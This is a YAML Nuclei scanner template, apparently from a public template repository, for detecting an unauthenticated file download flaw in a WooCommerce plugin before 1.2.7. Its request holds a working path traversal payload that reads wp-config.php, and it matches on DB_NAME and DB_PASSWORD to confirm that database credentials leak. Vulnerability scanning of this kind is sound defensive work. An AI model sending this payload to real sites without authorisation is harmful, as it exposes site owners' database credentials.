nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-file-downloa...

37 lines
1.2 KiB
YAML

id: wp-woocommerce-file-download
info:
name: WordPress WooCommerce < 1.2.7 - Unauthenticated File Download
author: 0x_Akoko
severity: high
description: WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated
users to download arbitrary files from the blog using a path traversal payload.
reference:
- https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74
- https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
tags: wordpress,woocommerce,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/04/13